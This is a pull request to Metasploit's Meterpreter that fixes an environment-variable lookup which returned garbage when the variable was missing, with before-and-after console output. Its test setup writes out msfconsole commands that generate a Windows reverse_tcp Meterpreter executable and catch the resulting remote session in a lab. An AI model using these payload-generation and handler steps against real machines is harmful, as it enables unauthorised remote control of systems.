### PR TITLE
fix bug where env lookups not found return garbage

### DIFF
--- a/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
@@ -94,7 +94,8 @@ DWORD request_sys_config_getenv(Remote *remote, Packet *packet)
 			PWCHAR name = met_api->string.utf8_to_wchar(pEnvVarStart);
 			//Ensure we always have > 0 bytes even if env var doesn't exist
 			DWORD envlen = GetEnvironmentVariableW(name, NULL, 0);
-			if ((envlen == 0) && (GetLastError() == ERROR_ENVVAR_NOT_FOUND)) 
+			if (envlen == 0)
+
 			{
 				dprintf("[ENV] Env var not found");
 			}


### PR DESCRIPTION
This fixes [a bug](https://github.com/rapid7/metasploit-framework/issues/17404) in framework where looking up an environment variable that doesn't exist doesn't cause an error, and instead returns unintelligible nonsense. 

Tested on Windows 2016 Server VM, mac host machine

Setup:
```
msf6 > use windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set LHOST 192.168.2.1
LHOST => 192.168.2.1
msf6 payload(windows/meterpreter/reverse_tcp) > set meterpreterdebugbuild true
meterpreterdebugbuild => true
msf6 payload(windows/meterpreter/reverse_tcp) > generate -f exe -o shell.exe
[*] Writing 73802 bytes to shell.exe...
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.2.1:4444 
msf6 payload(windows/meterpreter/reverse_tcp) > WARNING: Local file /Users/zgoldman/Documents/R7Code/metasploit-framework/data/meterpreter/metsrv.x86.debug.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (240718 bytes) to 192.168.2.132
WARNING: Local file /Users/zgoldman/Documents/R7Code/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.debug.dll is being used
WARNING: Local file /Users/zgoldman/Documents/R7Code/metasploit-framework/data/meterpreter/ext_server_priv.x86.debug.dll is being used
[*] Meterpreter session 1 opened (192.168.2.1:4444 -> 192.168.2.132:49723) at 2023-06-15 13:15:46 -0500
sessions -i -1
[*] Starting interaction with 1...

```

Before:
```
meterpreter > getenv FOOBAR

Environment Variables
=====================

Variable  Value
--------  -----
FOOBAR    �����������������������������������������������������S���������������������������������������������������

meterpreter > 
```

After:

```
meterpreter > getenv FOOBAR
[-] None of the specified environment variables were found/set.

```
